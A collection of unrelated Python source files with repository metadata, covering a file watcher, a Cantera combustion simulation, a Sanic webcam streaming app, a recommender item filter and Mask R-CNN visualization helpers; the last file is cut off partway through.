elif row[0] == 'restart':
param[row[0]] = int(row[1])
restartFlag = not (0 == int(row[1]))
else:
param[row[0]] = int(row[1])
dir_split = param['copy_path'].split('_')
dir_base = '_'.join(dir_split[:-1])
dir_number = int(dir_split[-1])
# dir_base = param['copy_path'].split('_')[:-1]
# print(dir_base)
# print(dir_number)
# print('{:02}'.format(dir_number))
# print('{:02}'.format(111))
degs = list(range(param['start_deg'], param['end_deg']+1, param['deg_step']))
if len(degs) < 1:
print("degree setting is wrong!")
time.sleep(3)
exit()
if param['repeat'] == 1:
dist_path = [param['copy_path']]
elif param['repeat'] > 1:
dist_path = [param['copy_path'] + '/{:d}'.format(i+1) for i in range(param['repeat'])]
else:
print("repeat setting is wrong!")
time.sleep(3)
exit()
if param['check_time'] < 10:
print("check_time must be at least 10!")
time.sleep(3)
exit()
if param['margin_time'] < 10:
print("margin_time must be at least 10!")
time.sleep(3)
exit()
if param['finish_wait'] < 10:
print("finish_wait must be at least 10!")
time.sleep(3)
exit()
print("read parameter.csv")
###### read file_path_list.txt ######
if not os.path.exists('./file_path_list.txt'):
print("can't find file_path_list.txt")
time.sleep(3)
exit()
with open('./file_path_list.txt') as f:
file_paths = [l.replace("\n", "") for l in f.readlines()]
print("read file_path_list.txt")
###### watch files ######
for i in range(param['repeat']):
event_handler = FileChangeHandler(file_paths, dist_path[i], degs, param['margin_time']/1000)
observer = Observer()
observer.schedule(event_handler, os.path.dirname(file_paths[0]), recursive=True)
observer.start()
print("watching...")
try:
while True:
time.sleep(param['check_time']/1000)
event_handler.check_update()
if event_handler.check_finish():
time.sleep(param['finish_wait']/1000)
if param['repeat'] > 1:
print("finish:{:d}".format(i+1))
else:
print("finish")
observer.stop()
break
except KeyboardInterrupt:
observer.stop()
exit()
observer.join()
if restartFlag:
with open('./parameter.csv', 'w') as f:
for key in param:
if key == 'copy_path':
f.write(key + ',' + dir_base + '_' + '{:02}'.format(dir_number+1) + '\n')
else:
f.write(key + ',' + str(param[key]) + '\n')
|
[
"s.ishizuya@gmail.com"
] |
s.ishizuya@gmail.com
|
c14e4e6b0c57726048f651e0fe8dfea72fe11593
|
be413ec75c6498dd1b4139a530c8b95a479f8501
|
/examples/reactor1.py
|
2bc24af7b19cd7d8e2334deb584668280a54efa7
|
[
"MIT"
] |
permissive
|
Zeracesharon/code_transfer_rt
|
9898f4c19df5e452519ca3a385dabcebc999bd1c
|
b394fb6c322b2dc6f0f5dbcb93baf52f94032772
|
refs/heads/master
| 2022-12-12T12:01:21.119544
| 2020-09-02T05:44:44
| 2020-09-02T05:44:44
| 291,857,458
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,848
|
py
|
"""
Constant-pressure, adiabatic kinetics simulation.
Requires: cantera >= 2.5.0, matplotlib >= 2.0
"""
import sys
import cantera as ct
from time import perf_counter
t0_start = perf_counter()
gas = ct.Solution('ic8_ver3_mech.yaml')
gas.TPX = 1200.0, ct.one_atm*20, 'IC8H18:1.0,O2:12.5,N2:47.00'
r = ct.IdealGasConstPressureReactor(gas)
sim = ct.ReactorNet([r])
sim.verbose = True
# limit advance when temperature difference is exceeded
#delta_T_max = 20.
#r.set_advance_limit('temperature', delta_T_max)
dt_max = 1.e-6
t_end = 100000 * dt_max
states = ct.SolutionArray(gas, extra=['t'])
print('{:10s} {:10s} {:10s} {:14s}'.format(
't [s]', 'T [K]', 'P [Pa]', 'u [J/kg]'))
while sim.time < t_end:
sim.advance(sim.time + dt_max)
states.append(r.thermo.state, t=sim.time*1e3)
print('{:10.3e} {:10.3f} {:10.3f} {:14.6f}'.format(
sim.time, r.T, r.thermo.P, r.thermo.u))
t_stop = perf_counter()
print('time spent {:.1e} [s]'.format(t_stop - t0_start))
# Plot the results if matplotlib is installed.
# See http://matplotlib.org/ to get it.
if '--plot' in sys.argv[1:]:
import matplotlib.pyplot as plt
plt.clf()
plt.subplot(2, 2, 1)
plt.plot(states.t, states.T)
plt.xlabel('Time (ms)')
plt.ylabel('Temperature (K)')
plt.subplot(2, 2, 2)
plt.plot(states.t, states.X[:, gas.species_index('OH')])
plt.xlabel('Time (ms)')
plt.ylabel('OH Mole Fraction')
plt.subplot(2, 2, 3)
plt.plot(states.t, states.X[:, gas.species_index('H')])
plt.xlabel('Time (ms)')
plt.ylabel('H Mole Fraction')
plt.subplot(2, 2, 4)
plt.plot(states.t, states.X[:, gas.species_index('H2')])
plt.xlabel('Time (ms)')
plt.ylabel('H2 Mole Fraction')
plt.tight_layout()
plt.show()
else:
print("To view a plot of these results, run this script with the option --plot")
|
[
"j51601071066@sjtu.edu.cn"
] |
j51601071066@sjtu.edu.cn
|
bd2ae9309e7631af3bfdc3ec5029c84fbbf0208c
|
69e89c0290ef5d2418a11cb1963a7c14240d120e
|
/sanic-video-streaming/app.py
|
c00f35baf9fd11266cdc7d7f877c99f2a35beff8
|
[] |
no_license
|
baojiweicn/Thinking-in-Coroutines
|
4d0a433c5969c9f3f941dbfea0199bc199383fd3
|
b11327fede95384e74a9361841fcb545c310b992
|
refs/heads/master
| 2020-03-19T01:11:02.387204
| 2018-06-04T09:32:13
| 2018-06-04T09:32:13
| 135,527,997
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,499
|
py
|
import asyncio
import os
import logging
if os.environ.get('CAMERA'):
Camera = import_module('camera_' + os.environ['CAMERA']).Camera
else:
from camera import Camera
import aredis
from sanic import Sanic, response
app = Sanic(__name__)
app.static('/','./templates')
logger = logging.getLogger('chat')
class Redis:
_pool = None
async def get_redis_pool(self):
if not self._pool:
self._pool = aredis.StrictRedis(host='localhost', port=6379)
return self._pool
redis = Redis()
@app.listener('before_server_start')
async def before_srver_start(app, loop):
app.broker = await redis.get_redis_pool()
@app.route("/index")
async def index(request):
return response.redirect("index.html")
async def subscribe(request,ws):
subscriber = request.app.broker.pubsub()
await subscriber.subscribe(['room1'])
msg = await subscriber.get_message()
while True:
msg = await subscriber.get_message()
data = msg['data']
logger.info(msg)
try:
data = data.decode()
except Exception:
pass
await ws.send(data)
async def publish(request,ws):
camera = Camera()
while True:
frame = camera.get_frame()
await request.app.broker.publish('room1', frame)
@app.websocket('/chat')
async def chat(request, ws):
await asyncio.gather(publish(request,ws),subscribe(request,ws))
if __name__ == '__main__':
app.run(host="0.0.0.0", port=8000, debug=True)
|
[
"baojiwei@kezaihui.com"
] |
baojiwei@kezaihui.com
|
a441853d154eee540f32e236f10199178fbec6c4
|
7d12cb2a55406f46c131a53052de610852b8ddff
|
/event-collector/collector/filter/location.py
|
fe12a7ecd8a3bfd0b2f4b9e3262a7415fd26c439
|
[] |
no_license
|
ivarsv/liepajasafisa
|
19015747de7b5d9f72b60512c8433fd62cd6c084
|
b0f31069f84cb84c67c5fe01c3d6c78ee0040728
|
refs/heads/master
| 2020-04-06T06:45:34.475368
| 2013-11-28T18:52:32
| 2013-11-28T18:52:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 650
|
py
|
# coding=utf8
from collector.model import ComparisonFilter
groups = []
groups.append([u"Jauno mediju mākslas laboratorija", u"Liepājas Universitāte"])
groups.append([u"Red Sun Buffet", u"Kokteiļbārs \"Red Sun Buffet\""])
groups.append([u"Ideju bode", u"Radošā telpa \"Ideju bode\""])
class LocationGroupPriority(ComparisonFilter):
def modify(self, event1, event2):
for group in groups:
try:
index = min(group.index(event1.location), group.index(event2.location))
event1.location = group[index]
event2.location = group[index]
except:
pass
|
[
"ivarsv@gmail.com"
] |
ivarsv@gmail.com
|
68674be51f1c5fc7a44c0f19119a639c39055abd
|
661d07470126790629f29efb7aa0f431b771b660
|
/test_dataset.py
|
80a7cd22518aeee249997e3ca54edae3b0c84256
|
[] |
no_license
|
johndpope/fcnn_detector
|
a43daf38e3736f1644c7340050f5da4ad2147742
|
e97525708161b6673ed53324dc5c85370d2f97c6
|
refs/heads/master
| 2021-01-12T04:40:00.177807
| 2016-10-15T14:15:14
| 2016-10-15T14:15:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,761
|
py
|
""" Create a class to hold the Dataset generation """
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import cv2
import numpy as np
DEBUG = False
class TestDataset(object):
def __init__(self, root_dir):
"""
Creates an instance of Dataset holder.
Store all training and test data into memory
root_dir: Specifies the directory to load the data from
"""
self.images_paths = []
self.init_dataset(root_dir)
def init_directory(self, images_dir):
""" Read all image content from input directory
"""
for dir_name, _, file_list in os.walk(images_dir):
for file_name in file_list:
image_file = os.path.join(dir_name, file_name)
self.images_paths.append(image_file)
print("Loaded {} images.".format(len(self.images_paths)))
def init_dataset(self, root_dir):
""" Load content from all classes and initialise each samples
"""
if not root_dir.endswith('/'):
root_dir = root_dir + '/'
self.init_directory(root_dir)
@staticmethod
def get_image(path):
return cv2.imread(path, cv2.IMREAD_GRAYSCALE)
@staticmethod
def normalize(mat):
return mat.astype(np.float32) / 255.0
def iterate_set(self, input_size):
in_h, in_w, in_c = input_size
inputs = np.empty((1, in_h, in_w, in_c), dtype=np.float32)
for path in self.images_paths:
image = self.get_image(path)
image = cv2.resize(image, (in_h, in_w), interpolation=cv2.INTER_AREA)
inputs[0, :, :, 0] = self.normalize(image)
yield inputs
|
[
"laurent.decamp@gmail.com"
] |
laurent.decamp@gmail.com
|
9084a6c8e1d09a461a2e3f5b9dbde5c8b8ab30ae
|
bbb0860aa87d0e49e0e3099b553c744961fb0189
|
/ИТОГ ПРОЕКТ СДАЧА/src/utils.py
|
6fdaa4b41c9533db57f3b00c6c07a67ef28f687b
|
[] |
no_license
|
bigdatacon/ML
|
16618ffd837c734d2e5d8afae6d0dd1cd7e8c725
|
fa6b0a66f9fec5f2e648a8782f7166f9015c5df6
|
refs/heads/master
| 2022-11-24T06:23:48.377470
| 2020-08-02T19:58:45
| 2020-08-02T19:58:45
| 263,444,620
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,608
|
py
|
import pandas as pd
import numpy as np
def prefilter_items(data, take_n_popular=2000, item_features=None):
# Уберем самые популярные товары (их и так купят)
popularity = data.groupby('item_id')['user_id'].nunique().reset_index() / data['user_id'].nunique()
popularity.rename(columns={'user_id': 'share_unique_users'}, inplace=True)
top_popular = popularity[popularity['share_unique_users'] > 0.2].item_id.tolist()
data = data[~data['item_id'].isin(top_popular)]
# Уберем самые НЕ популярные товары (их и так НЕ купят)
top_notpopular = popularity[popularity['share_unique_users'] < 0.02].item_id.tolist()
data = data[~data['item_id'].isin(top_notpopular)]
# Уберем товары, которые не продавались за последние 12 месяцев
# Уберем не интересные для рекоммендаций категории (department)
if item_features is not None:
department_size = pd.DataFrame(item_features.\
groupby('department')['item_id'].nunique().\
sort_values(ascending=False)).reset_index()
department_size.columns = ['department', 'n_items']
rare_departments = department_size[department_size['n_items'] < 150].department.tolist()
items_in_rare_departments = item_features[item_features['department'].isin(rare_departments)].item_id.unique().tolist()
data = data[~data['item_id'].isin(items_in_rare_departments)]
# Уберем слишком дешевые товары (на них не заработаем). 1 покупка из рассылок стоит 60 руб.
data['price'] = data['sales_value'] / (np.maximum(data['quantity'], 1))
data = data[data['price'] > 2]
# Уберем слишком дорогие товарыs
data = data[data['price'] < 50]
# Возбмем топ по популярности
popularity = data.groupby('item_id')['quantity'].sum().reset_index()
popularity.rename(columns={'quantity': 'n_sold'}, inplace=True)
top = popularity.sort_values('n_sold', ascending=False).head(take_n_popular).item_id.tolist()
# Заведем фиктивный item_id (если юзер покупал товары из топ-5000, то он "купил" такой товар)
data.loc[~data['item_id'].isin(top), 'item_id'] = 999999
# ...
return data
def postfilter_items(user_id, recommednations):
pass
|
[
"noreply@github.com"
] |
bigdatacon.noreply@github.com
|
1693c758f2c5cf600463f7be6a97c24efec33c8a
|
79a5a03461ff0c8905ced690b5c900bc2c031525
|
/visualize.py
|
d6dc0e7cca9ea31634538410556fa76e3549c34b
|
[] |
no_license
|
himanshucodz55/Social_Distancing_Ai_COVID19
|
f5ba1146acf8ead00b944e558aad46313a549076
|
ff138b7f3d6d109722a19fbad1b87d68e0da3a5d
|
refs/heads/master
| 2022-12-10T22:58:39.752672
| 2020-09-02T17:43:57
| 2020-09-02T17:43:57
| 292,346,633
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,401
|
py
|
"""
Mask R-CNN
Display and Visualization Functions.
Copyright (c) 2017 Matterport, Inc.
Licensed under the MIT License (see LICENSE for details)
Written by Waleed Abdulla
"""
import random
import itertools
import colorsys
import numpy as np
from skimage.measure import find_contours
import matplotlib.pyplot as plt
import matplotlib.patches as patches
import matplotlib.lines as lines
from matplotlib.patches import Polygon
import IPython.display
import utils
import cv2
############################################################
# Visualization
############################################################
def display_images(images, titles=None, cols=4, cmap=None, norm=None,
interpolation=None):
"""Display the given set of images, optionally with titles.
images: list or array of image tensors in HWC format.
titles: optional. A list of titles to display with each image.
cols: number of images per row
cmap: Optional. Color map to use. For example, "Blues".
norm: Optional. A Normalize instance to map values to colors.
interpolation: Optional. Image interporlation to use for display.
"""
titles = titles if titles is not None else [""] * len(images)
rows = len(images) // cols + 1
plt.figure(figsize=(14, 14 * rows // cols))
i = 1
for image, title in zip(images, titles):
plt.subplot(rows, cols, i)
plt.title(title, fontsize=9)
plt.axis('off')
# plt.imshow(image.astype(np.uint8), cmap=cmap,
# norm=norm, interpolation=interpolation)
i += 1
plt.show()
random.seed(0)
N=90
brightness = 1.0
hsv = [(i / N, 1, brightness) for i in range(N)]
random.shuffle(hsv)
def random_colors(N, bright=True):
"""
Generate random colors.
To get visually distinct colors, generate them in HSV space then
convert to RGB.
"""
all_colors = list(map(lambda c: colorsys.hsv_to_rgb(*c), hsv))
return all_colors
def class_color(id,prob):
_hsv = list(hsv[id])
# _hsv[2]=random.uniform(0.8, 1)
_hsv[2]=prob
color = colorsys.hsv_to_rgb(*_hsv)
return color
def apply_mask(image, mask, color, alpha=0.5):
"""Apply the given mask to the image.
"""
for c in range(3):
image[:, :, c] = np.where(mask == 1,
image[:, :, c] *
(1 - alpha) + alpha * color[c] * 255,
image[:, :, c])
return image
def display_instances(image, boxes, masks, class_ids, class_names,scores=None, title="",figsize=(16, 16), ax=None,risky=None,index=None):
"""
boxes: [num_instance, (y1, x1, y2, x2, class_id)] in image coordinates.
masks: [num_instances, height, width]
class_ids: [num_instances]
class_names: list of class names of the dataset
scores: (optional) confidence scores for each box
figsize: (optional) the size of the image.
"""
if index is not None:
# Number of instances
N = boxes.shape[0]
# if not N:
# print("\n*** No instances to display *** \n")
# else:
# assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0]
if not ax:
_, ax = plt.subplots(1, figsize=figsize)
# Generate random colors
colors = random_colors(N)
# Show area outside image boundaries.
height, width = image.shape[:2]
ax.set_ylim(height + 10, -10)
ax.set_xlim(-10, width + 10)
ax.axis('off')
ax.set_title(title)
l=0
masked_image = image.astype(np.uint32).copy()
for i in index:
# color = colors[i]
# print("##################################",i,color)
color=(0.26666666666666683, 1.0, 0.25)
color1=(0.0,0.0,1.0)
# Bounding box
if not np.any(boxes[l]):
# Skip this instance. Has no bbox. Likely lost in image cropping.
continue
y1, x1, y2, x2 = boxes[l]
l+=1
# p = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2,
# alpha=0.7, linestyle="dashed",
# edgecolor=None, facecolor='none')
# ax.add_patch(p)
# ax.circle()
# ax.Circle( ((x1+x2)/2,y2), 5, (0, 0, 255), -1)
# center= plt.Circle(((x1+x2)/2,y2),5,color="blue")
# ax.add_patch(center)
if class_ids[i]==1:
# Label
class_id = class_ids[i]
score = scores[i] if scores is not None else None
label = class_names[class_id]
x = random.randint(x1, (x1 + x2) // 2)
caption = "{} {:.3f}".format(label, score) if score else label
ax.text(x1, y1 + 8, caption,color='w', size=11, backgroundcolor="none")
# Mask
if (risky is not None) and (i in risky):
# ii=risky[i]
# print("risky_ids: ",i)
mask = masks[:, :, i]
masked_image = apply_mask(masked_image, mask, color1)
# Mask Polygon
# Pad to ensure proper polygons for masks that touch image edges.
padded_mask = np.zeros((mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8)
padded_mask[1:-1, 1:-1] = mask
contours = find_contours(padded_mask, 0.5)
for verts in contours:
# Subtract the padding and flip (y, x) to (x, y)
verts = np.fliplr(verts) - 1
p = Polygon(verts, facecolor="none", edgecolor=color1)
ax.add_patch(p)
else:
mask = masks[:, :, i]
masked_image = apply_mask(masked_image, mask, color)
# Mask Polygon
# Pad to ensure proper polygons for masks that touch image edges.
padded_mask = np.zeros((mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8)
padded_mask[1:-1, 1:-1] = mask
contours = find_contours(padded_mask, 0.5)
for verts in contours:
# Subtract the padding and flip (y, x) to (x, y)
verts = np.fliplr(verts) - 1
p = Polygon(verts, facecolor="none", edgecolor=color)
ax.add_patch(p)
# ax.imshow(masked_image.astype(np.uint8))
return masked_image.astype(np.uint8)
def draw_instances(image, boxes, masks, class_ids, class_names,
scores=None, title="",
figsize=(16, 16), ax=None):
"""
boxes: [num_instance, (y1, x1, y2, x2, class_id)] in image coordinates.
masks: [num_instances, height, width]
class_ids: [num_instances]
class_names: list of class names of the dataset
scores: (optional) confidence scores for each box
figsize: (optional) the size of the image.
"""
# Number of instances
N = boxes.shape[0]
if not N:
print("\n*** No instances to display *** \n")
else:
assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0]
# if not ax:
# _, ax = plt.subplots(1, figsize=figsize)
# Generate random colors
colors = random_colors(N)
# Show area outside image boundaries.
height, width = image.shape[:2]
masked_image = image.copy()
for i in range(N):
class_id = class_ids[i]
score = scores[i] if scores is not None else None
# color = colors[i]
color = class_color(class_id,score*score*score*score)
# Bounding box
if not np.any(boxes[i]):
# Skip this instance. Has no bbox. Likely lost in image cropping.
continue
y1, x1, y2, x2 = boxes[i]
# p = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2,
# alpha=0.7, linestyle="dashed",
# edgecolor=color, facecolor='none')
cv2.rectangle(masked_image, (x1, y1),(x2, y2), [int(x*255) for x in (color)],4)
# Label
label = class_names[class_id]
x = random.randint(x1, (x1 + x2) // 2)
caption = "%s %d%%"%(label, int(score*100)) if score else label
# ax.text(x1, y1 + 8, caption,
# color='w', size=11, backgroundcolor="none")
yyy=y1 -16
if yyy <0:
yyy=0
cv2.putText(masked_image, caption, (x1, yyy), cv2.FONT_HERSHEY_SIMPLEX, 1.5, [int(x*255) for x in (color)],4)
# Mask
mask = masks[:, :, i]
masked_image = apply_mask(masked_image, mask, color)
# Mask Polygon
# Pad to ensure proper polygons for masks that touch image edges.
padded_mask = np.zeros(
(mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8)
padded_mask[1:-1, 1:-1] = mask
contours = find_contours(padded_mask, 0.5)
for verts in contours:
# Subtract the padding and flip (y, x) to (x, y)
verts = np.fliplr(verts) - 1
p = Polygon(verts, facecolor="none", edgecolor=color)
# ax.add_patch(p)
pts = np.array(verts.tolist(), np.int32)
pts = pts.reshape((-1,1,2))
cv2.polylines(masked_image,[pts],True,[int(x*255) for x in (color)],4)
return masked_image.astype(np.uint8)
def draw_rois(image, rois, refined_rois, mask, class_ids, class_names, limit=10):
"""
anchors: [n, (y1, x1, y2, x2)] list of anchors in image coordinates.
proposals: [n, 4] the same anchors but refined to fit objects better.
"""
masked_image = image.copy()
# Pick random anchors in case there are too many.
ids = np.arange(rois.shape[0], dtype=np.int32)
ids = np.random.choice(
ids, limit, replace=False) if ids.shape[0] > limit else ids
fig, ax = plt.subplots(1, figsize=(12, 12))
if rois.shape[0] > limit:
plt.title("Showing {} random ROIs out of {}".format(
len(ids), rois.shape[0]))
else:
plt.title("{} ROIs".format(len(ids)))
# Show area outside image boundaries.
ax.set_ylim(image.shape[0] + 20, -20)
ax.set_xlim(-50, image.shape[1] + 20)
ax.axis('off')
for i, id in enumerate(ids):
color = np.random.rand(3)
class_id = class_ids[id]
# ROI
y1, x1, y2, x2 = rois[id]
p = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2,
edgecolor=color if class_id else "gray",
facecolor='none', linestyle="dashed")
ax.add_patch(p)
# Refined ROI
if class_id:
ry1, rx1, ry2, rx2 = refined_rois[id]
p = patches.Rectangle((rx1, ry1), rx2 - rx1, ry2 - ry1, linewidth=2,
edgecolor=color, facecolor='none')
ax.add_patch(p)
# Connect the top-left corners of the anchor and proposal for easy visualization
ax.add_line(lines.Line2D([x1, rx1], [y1, ry1], color=color))
# Label
label = class_names[class_id]
ax.text(rx1, ry1 + 8, "{}".format(label),
color='w', size=11, backgroundcolor="none")
# Mask
m = utils.unmold_mask(mask[id], rois[id]
[:4].astype(np.int32), image.shape)
masked_image = apply_mask(masked_image, m, color)
# ax.imshow(masked_image)
# Print stats
print("Positive ROIs: ", class_ids[class_ids > 0].shape[0])
print("Negative ROIs: ", class_ids[class_ids == 0].shape[0])
print("Positive Ratio: {:.2f}".format(
class_ids[class_ids > 0].shape[0] / class_ids.shape[0]))
# TODO: Replace with matplotlib equivalent?
def draw_box(image, box, color):
"""Draw 3-pixel width bounding boxes on the given image array.
color: list of 3 int values for RGB.
"""
y1, x1, y2, x2 = box
image[y1:y1 + 2, x1:x2] = color
image[y2:y2 + 2, x1:x2] = color
image[y1:y2, x1:x1 + 2] = color
image[y1:y2, x2:x2 + 2] = color
return image
def display_detections(image, gt_boxes, boxes, masks, class_ids, class_names, scores=None):
"""
boxes: [num_instance, (y1, x1, y2, x2, class_id)] in image coordinates.
masks: [num_instances, height, width]
class_ids: [num_instances]
class_names: list of class names of the dataset
scores: (optional) confidence scores for each box
"""
assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0]
fig, ax = plt.subplots(1, figsize=(20,20))
N = boxes.shape[0] # number of instances
colors = random_colors(N)
# Show area outside image boundaries.
height, width = image.shape[:2]
ax.set_ylim(height+10, -10)
ax.set_xlim(-10, width+10)
ax.axis('off')
masked_image = image.astype(np.uint32).copy()
for i in range(N):
color = colors[i]
# Bounding box
if not np.any(boxes[i]):
# Skip this instance. Has no bbox. Likely lost in image cropping.
continue
y1, x1, y2, x2 = boxes[i]
p = patches.Rectangle((x1, y1), x2-x1, y2-y1, linewidth=2, alpha=0.7, linestyle="dashed",
edgecolor=color, facecolor='none')
ax.add_patch(p)
# Label
class_id = class_ids[i]
score = scores[i] if scores is not None else None
label = class_names[class_id]
x = random.randint(x1, (x1+x2)//2)
ax.text(x1, y1+8, "{} {:.3f}".format(label, score) if score else label,
color='w', size=11, backgroundcolor="none")
# Mask
mask = masks[:,:,i]
masked_image = apply_mask(masked_image, mask, color)
# Mask Polygon
# Pad the mask to ensure proper polygons for mask that touch image edges.
padded_mask = np.zeros((mask.shape[0]+2, mask.shape[1]+2), dtype=np.uint8)
padded_mask[1:-1,1:-1] = mask
contours = find_contours(padded_mask, 0.5)
for verts in contours:
# Subtract the padding and flip (y, x) to (x, y)
verts = np.fliplr(verts) - 1
p = Polygon(verts, facecolor="none", edgecolor=color)
ax.add_patch(p)
return plt.imshow(masked_image.astype(np.uint8))
def display_top_masks(image, mask, class_ids, class_names, limit=4):
"""Display the given image and the top few class masks."""
to_display = []
titles = []
to_display.append(image)
titles.append("H x W={}x{}".format(image.shape[0], image.shape[1]))
# Pick top prominent classes in this image
unique_class_ids = np.unique(class_ids)
mask_area = [np.sum(mask[:, :, np.where(class_ids == i)[0]])
for i in unique_class_ids]
top_ids = [v[0] for v in sorted(zip(unique_class_ids, mask_area),
key=lambda r: r[1], reverse=True) if v[1] > 0]
# Generate images and titles
for i in range(limit):
class_id = top_ids[i] if i < len(top_ids) else -1
# Pull masks of instances belonging to the same class.
m = mask[:, :, np.where(class_ids == class_id)[0]]
m = np.sum(m * np.arange(1, m.shape[-1]+1), -1)
to_display.append(m)
titles.append(class_names[class_id] if class_id != -1 else "-")
display_images(to_display, titles=titles, cols=limit+1, cmap="Blues_r")
def plot_precision_recall(AP, precisions, recalls):
"""Draw the precision-recall curve.
AP: Average precision at IoU >= 0.5
precisions: list of precision values
recalls: list of recall values
"""
# Plot the Precision-Recall curve
_, ax = plt.subplots(1)
ax.set_title("Precision-Recall Curve. AP@50 = {:.3f}".format(AP))
ax.set_ylim(0, 1.1)
ax.set_xlim(0, 1.1)
_ = ax.plot(recalls, precisions)
def plot_overlaps(gt_class_ids, pred_class_ids, pred_scores,
overlaps, class_names, threshold=0.5):
"""Draw a grid showing how ground truth objects are classified.
gt_class_ids: [N] int. Ground truth class IDs
pred_class_id: [N] int. Predicted class IDs
pred_scores: [N] float. The probability scores of predicted classes
overlaps: [pred_boxes, gt_boxes] IoU overlaps of predictins and GT boxes.
class_names: list of all class names in the dataset
threshold: Float. The prediction probability required to predict a class
"""
gt_class_ids = gt_class_ids[gt_class_ids != 0]
pred_class_ids = pred_class_ids[pred_class_ids != 0]
plt.figure(figsize=(12, 10))
plt.imshow(overlaps, interpolation='nearest', cmap=plt.cm.Blues)
plt.yticks(np.arange(len(pred_class_ids)),
["{} ({:.2f})".format(class_names[int(id)], pred_scores[i])
for i, id in enumerate(pred_class_ids)])
plt.xticks(np.arange(len(gt_class_ids)),
[class_names[int(id)] for id in gt_class_ids], rotation=90)
thresh = overlaps.max() / 2.
for i, j in itertools.product(range(overlaps.shape[0]),
range(overlaps.shape[1])):
text = ""
if overlaps[i, j] > threshold:
text = "match" if gt_class_ids[j] == pred_class_ids[i] else "wrong"
color = ("white" if overlaps[i, j] > thresh
else "black" if overlaps[i, j] > 0
else "grey")
plt.text(j, i, "{:.3f}\n{}".format(overlaps[i, j], text),
horizontalalignment="center", verticalalignment="center",
fontsize=9, color=color)
plt.tight_layout()
plt.xlabel("Ground Truth")
plt.ylabel("Predictions")
def draw_boxes(image, boxes=None, refined_boxes=None,
masks=None, captions=None, visibilities=None,
title="", ax=None):
"""Draw bounding boxes and segmentation masks with differnt
customizations.
boxes: [N, (y1, x1, y2, x2, class_id)] in image coordinates.
refined_boxes: Like boxes, but draw with solid lines to show
that they're the result of refining 'boxes'.
masks: [N, height, width]
captions: List of N titles to display on each box
visibilities: (optional) List of values of 0, 1, or 2. Determine how
prominant each bounding box should be.
title: An optional title to show over the image
ax: (optional) Matplotlib axis to draw on.
"""
# Number of boxes
assert boxes is not None or refined_boxes is not None
N = boxes.shape[0] if boxes is not None else refined_boxes.shape[0]
# Matplotlib Axis
if not ax:
_, ax = plt.subplots(1, figsize=(12, 12))
# Generate random colors
colors = random_colors(N)
# Show area outside image boundaries.
margin = image.shape[0] // 10
ax.set_ylim(image.shape[0] + margin, -margin)
ax.set_xlim(-margin, image.shape[1] + margin)
ax.axis('off')
ax.set_title(title)
masked_image = image.astype(np.uint32).copy()
for i in range(N):
# Box visibility
visibility = visibilities[i] if visibilities is not None else 1
if visibility == 0:
color = "gray"
style = "dotted"
alpha = 0.5
elif visibility == 1:
color = colors[i]
style = "dotted"
alpha = 1
elif visibility == 2:
color = colors[i]
style = "solid"
alpha = 1
# Boxes
if boxes is not None:
if not np.any(boxes[i]):
# Skip this instance. Has no bbox. Likely lost in cropping.
continue
y1, x1, y2, x2 = boxes[i]
p = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2,
alpha=alpha, linestyle=style,
edgecolor=color, facecolor='none')
ax.add_patch(p)
# Refined boxes
if refined_boxes is not None and visibility > 0:
ry1, rx1, ry2, rx2 = refined_boxes[i].astype(np.int32)
p = patches.Rectangle((rx1, ry1), rx2-rx1, ry2-ry1, linewidth=2,
edgecolor=color, facecolor='none')
ax.add_patch(p)
# Connect the top-left corners of the anchor and proposal
if boxes is not None:
ax.add_line(lines.Line2D([x1, rx1], [y1, ry1], color=color))
# Captions
if captions is not None:
caption = captions[i]
# If there are refined boxes, display captions on them
if refined_boxes is not None:
y1, x1, y2, x2 = ry1, rx1, ry2, rx2
x = random.randint(x1, (x1 + x2) // 2)
ax.text(x1, y1, caption, size=11, verticalalignment='top',
color='w', backgroundcolor="none",
bbox={'facecolor': color, 'alpha': 0.5,
'pad': 2, 'edgecolor': 'none'})
# Masks
if masks is not None:
mask = masks[:, :, i]
masked_image = apply_mask(masked_image, mask, color)
# Mask Polygon
# Pad to ensure proper polygons for masks that touch image edges.
padded_mask = np.zeros(
(mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8)
padded_mask[1:-1, 1:-1] = mask
contours = find_contours(padded_mask, 0.5)
for verts in contours:
# Subtract the padding and flip (y, x) to (x, y)
verts = np.fliplr(verts) - 1
p = Polygon(verts, facecolor="none", edgecolor=color)
ax.add_patch(p)
# ax.imshow(masked_image.astype(np.uint8))
def display_table(table):
"""Display values in a table format.
table: an iterable of rows, and each row is an iterable of values.
"""
html = ""
for row in table:
row_html = ""
for col in row:
row_html += "<td>{:40}</td>".format(str(col))
html += "<tr>" + row_html + "</tr>"
html = "<table>" + html + "</table>"
IPython.display.display(IPython.display.HTML(html))
def display_weight_stats(model):
"""Scans all the weights in the model and returns a list of tuples
that contain stats about each weight.
"""
layers = model.get_trainable_layers()
table = [["WEIGHT NAME", "SHAPE", "MIN", "MAX", "STD"]]
for l in layers:
weight_values = l.get_weights() # list of Numpy arrays
weight_tensors = l.weights # list of TF tensors
for i, w in enumerate(weight_values):
weight_name = weight_tensors[i].name
# Detect problematic layers. Exclude biases of conv layers.
alert = ""
if w.min() == w.max() and not (l.__class__.__name__ == "Conv2D" and i == 1):
alert += "<span style='color:red'>*** dead?</span>"
if np.abs(w.min()) > 1000 or np.abs(w.max()) > 1000:
alert += "<span style='color:red'>*** Overflow?</span>"
# Add row
table.append([
weight_name + alert,
str(w.shape),
"{:+9.4f}".format(w.min()),
"{:+10.4f}".format(w.max()),
